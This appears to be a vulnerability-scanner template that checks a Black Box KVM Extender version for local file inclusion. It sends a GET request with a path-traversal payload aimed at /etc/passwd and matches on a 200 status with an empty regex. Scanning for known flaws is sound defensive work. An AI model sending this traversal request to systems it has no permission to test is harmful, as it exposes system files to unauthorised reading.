name:
  - "Black Box Kvm Extender 3.4.31307 - Local File Inclusion"
url:
  - "/cgi-bin/show?page=../../../../../../etc/passwd"
method:
  - "GET"
data:
  - ""
matchers:
  - Status:
      - 200
  - Regex:
      - ""